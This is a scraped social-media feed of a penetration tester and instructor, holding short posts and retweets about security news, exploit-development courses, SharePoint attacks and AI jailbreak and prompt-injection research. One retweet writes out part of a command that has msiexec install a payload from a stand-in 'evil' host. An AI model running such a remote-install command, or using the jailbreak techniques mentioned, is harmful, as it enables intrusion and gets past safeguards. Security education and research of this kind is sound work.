timboloman Profile Banner
Timothy McKenzie Profile
Timothy McKenzie

@timboloman

Followers
450
Following
1K
Media
97
Statuses
687

Christian, Professional Geek, Penetration Tester, SANS Principal Instructor and co-author

Dallas, Texas
Joined December 2012
Don't wanna be here? Send us removal request.
@timboloman
Timothy McKenzie
8 hours
Last week's tidbits:. Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ for Enterprise.Research suggests GPT-5 is more easily exploited than earlier models, such as 4o. These attacks highlight the importance of testing LLM implementations in organizations.
0
0
0
@timboloman
Timothy McKenzie
3 days
RT @Steph3nSims: Novel HTTP/1 Request Smuggling/Desync Attacks with James Kettle
0
14
0
@grok
Grok
8 days
Generate videos in just a few seconds. Try Grok Imagine, free for a limited time.
416
687
3K
@timboloman
Timothy McKenzie
3 days
AI is already accelerating penetration testing. In a verified benchmark, an AI platform matched a veteran’s success rate in about half an hour while the human needed forty hours. The deep dive explains where that speed helps in practice, including triaging scan output, suggesting.
0
1
2
@timboloman
Timothy McKenzie
7 days
Last week's tidbits:.Zenity GenAI Attack Matrix Unveiled at BlackHat 2025: Security firm showcased exploits abusing enterprise AI assistants for data theft and manipulation, akin to SQL injection but in natural language. CrowdStrike Report Reveals 136%.
0
1
1
@timboloman
Timothy McKenzie
9 days
RT @ACEResponder: Windows lateral movement quick reference. #ThreatHunting #DFIR
Tweet media one
0
119
0
@timboloman
Timothy McKenzie
13 days
RT @bojanz: Ooh finally a new diary. This time about why attackers wanted to steal Machine Keys in #SharePoint attacks 2 weeks ago. Read al….
Tweet card summary image
isc.sans.edu
Stealing Machine Keys for fun and profit (or riding the SharePoint wave), Author: Bojan Zdrnja
0
1
0
@timboloman
Timothy McKenzie
14 days
Last week's tidbits:.HN Security Shares PoCs for Real-World GenAI Vulnerabilities: Post outlines exploits like prompt injections and unauthorized access in corporate LLM apps, emphasizing risks when AIs interface with databases or tools. Internal Phishing.
0
1
1
@timboloman
Timothy McKenzie
17 days
In 2025, zero-trust architectures (ZTAs) are revolutionizing network defense, but they're not impenetrable. My latest blog dives into advanced pentesting strategies, drawing from recent breaches like the ToolShell chain in Microsoft SharePoint (CVEs 2025-49704, -49706, -53770,.
0
4
2
@timboloman
Timothy McKenzie
19 days
Last week's tidbits:. OWASP Announces Webinar on GenAI Security Risks: OWASP scheduled a July 31 webinar to explore risks like prompt injections and model misuse in Generative AI, offering strategies for building and governing secure systems. Have you.
0
1
2
@timboloman
Timothy McKenzie
20 days
RT @Steph3nSims: The heavily updated version of the Advanced Exploit Dev course "SEC760" with my coauthor @0xabe_io was just recorded and a….
Tweet card summary image
sans.org
Develop advanced exploit development skills to discover vulnerabilities, analyze patches, and write complex exploits while working with modern security controls.
0
33
0
@timboloman
Timothy McKenzie
20 days
RT @0xfluxsec: Introducing: Hells Hollow - Thought rootkit SSDT hooking was dead? Following my previous work, I have managed to essentially….
0
99
0
@timboloman
Timothy McKenzie
21 days
RT @McGrewSecurity: I've updated my site with my scheduled @defcon 33 content: talk, workshops, @WSIIAOfficial, and a @RayRedacted joint. W….
0
5
0
@timboloman
Timothy McKenzie
22 days
RT @T3chFalcon: Most people think .msi files are just installers. But red teamers know better. msiexec.exe /i http://evil[.]com/payload[.….
0
91
0
@timboloman
Timothy McKenzie
25 days
RT @flakpaket: The man who humbly asks, "Am I right?" and then proceeds to test and prove his position by earnest thought and the love of T….
0
1
0
@timboloman
Timothy McKenzie
26 days
RT @Steph3nSims: Join me this Friday at 11AM PT on the @offby1security stream with the team from @dreadnode for a session on "Building and….
0
22
0
@timboloman
Timothy McKenzie
27 days
Last week's tidbits:. SentinelOne Releases 2025 Cloud Security Risk Report: The report outlines persistent threats like misconfigurations and credential compromises in cloud environments, alongside emerging AI-related risks. CERT-UA uncovered APT28 using.
0
1
2
@timboloman
Timothy McKenzie
27 days
RT @Steph3nSims: Exploiting a Windows Application Using Return Oriented Programming
0
36
0
@timboloman
Timothy McKenzie
27 days
RT @Steph3nSims: Join me this Friday at 11AM PT on the @offby1security stream with the good folks from @dreadnode for a session on offensiv….
0
10
0
@timboloman
Timothy McKenzie
1 month
RT @inversecos: Red teamers, no need to “pull” clipboard data when Windows already saves it all on disk for you in a neat little file 🗿. (i….
0
326
0
@timboloman
Timothy McKenzie
1 month
RT @Steph3nSims: I will be streaming a portion of the SANS SEC660 course I'm teaching today in DC on Introduction to Windows Exploit Develo….
0
40
0